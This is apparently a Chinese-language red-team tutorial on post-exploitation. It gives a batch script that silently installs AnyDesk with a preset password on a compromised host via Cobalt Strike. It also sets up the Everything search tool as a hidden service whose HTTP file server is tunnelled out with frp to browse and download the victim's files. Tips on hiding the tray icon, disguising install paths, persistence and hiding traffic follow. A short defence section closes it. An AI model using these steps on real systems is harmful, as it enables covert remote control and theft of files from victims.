Anydesk静默安装与EveryThing后渗透信息搜集技术详解

一、Anydesk静默安装远控技术

1. 技术背景

在内网渗透中，当目标机器出网但3389端口未开放或防火墙限制RDP连接时，可以使用第三方远程控制软件如AnyDesk实现远控。

2. 静默安装步骤

1. 准备安装脚本：

@echo off
AnyDesk.exe --install "C:\Users\05\Videos\anydesk" --silent
echo licence_keyABC | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --register-licence
echo anydesk!@# | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --set-password
choice /t 10 /d y /n >nul
for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i
echo Connection ID Is: %CID%

2. 关键参数说明：

• --install：指定安装路径
• --silent：静默安装模式
• --register-licence：注册许可证
• --set-password：设置连接密码

3. 执行流程：

• 先上线Cobalt Strike
• 上传安装文件到目标机指定目录
• 通过CS执行批处理脚本
• 获取连接ID用于远程连接

3. 注意事项

• 安装路径可根据实际情况修改
• 许可证和密码应替换为实际值
• 脚本执行后会有10秒延迟等待安装完成

二、利用EveryThing进行后渗透信息搜集

1. 技术背景

Everything是一款高效的文件搜索工具，APT组织曾多次利用其进行文件查找，具有白进程特性且支持命令行操作。

2. 配置步骤

1. 准备工作：

• 从官网下载64位便携版：https://www.voidtools.com/Everything-1.4.1.1009.x64.zip

2. 关键配置：

• 取消显示托盘图标：避免右下角出现显眼图标增加暴露风险
• 启用HTTP服务器：
  • 绑定IP为127.0.0.1（避免杀软拦截）
  • 设置账号密码（可选）
  • 使用frp将端口映射出来

3. 部署流程：

1. 在本地配置好Everything并生成配置文件
2. 只需保留以下两个文件：
   - Everything.exe（主程序）
   - Everything.ini（配置文件）
3. 将这两个文件上传到目标机器
4. 执行命令安装服务：
   Everything.exe -install-client-service
5. 服务启动后端口即打开
6. 使用frp映射配置的端口

3. 高级功能

• 无感运行：通过安装自启服务实现
• UAC权限：安装服务需要UAC权限
• 远程访问：
  • 可通过HTTP接口在线查看文件
  • 支持直接下载文件
  • 比传统Cobalt Strike文件浏览更高效

三、综合应用建议

1. 组合使用：先通过Anydesk获取远控，再利用Everything进行高效信息搜集
2. 隐蔽性优化：
   • 修改Anydesk安装路径为看似正常的目录
   • Everything配置中使用非默认端口
3. 权限维持：
   • Anydesk可设置为开机自启
   • Everything服务实现持久化
4. 流量隐藏：
   • 所有连接通过127.0.0.1绑定
   • 使用frp/ngrok等工具进行端口转发

四、防御建议

1. 检测Anydesk静默安装：
   • 监控临时目录的可执行文件
   • 检测批处理脚本中的敏感参数
2. 防范Everything滥用：
   • 限制非授权HTTP服务启动
   • 监控可疑的服务安装行为
   • 特别关注绑定到127.0.0.1的服务
3. 通用防御措施：
   • 启用应用程序白名单
   • 监控端口转发工具的使用
   • 加强UAC权限管理

以上技术文档详细介绍了Anydesk静默安装和Everything后渗透信息搜集的完整流程及关键点，可供红队操作参考，同时也提供了相应的防御建议。